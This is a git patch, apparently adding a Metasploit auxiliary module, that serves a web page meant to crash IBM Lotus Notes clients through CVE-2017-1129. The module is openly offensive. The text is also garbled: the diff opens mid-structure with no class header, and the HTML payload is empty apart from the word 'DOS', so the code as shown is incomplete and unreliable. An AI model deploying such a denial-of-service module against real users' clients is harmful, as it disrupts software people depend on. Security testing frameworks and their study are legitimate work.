From a71edb33be4634f7ab7a6d75a8b8c6b262b3bb38 Mon Sep 17 00:00:00 2001 From: RootUp Date: Fri, 22 Sep 2017 17:08:05 +0530 Subject: [PATCH] Create ibm_lotus_notes.rb --- modules/auxiliary/dos/ibm_lotus_notes.rb | 37 ++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 modules/auxiliary/dos/ibm_lotus_notes.rb diff --git a/modules/auxiliary/dos/ibm_lotus_notes.rb b/modules/auxiliary/dos/ibm_lotus_notes.rb new file mode 100644 index 0000000000..a5a552c07b --- /dev/null +++ b/modules/auxiliary/dos/ibm_lotus_notes.rb @@ -0,0 +1,37 @@ + + [ 'EXPLOIT-DB', '42602'], + [ 'CVE', '2017-1129' ] + ], + 'DisclosureDate' => "August 31 2017", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + DOS + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end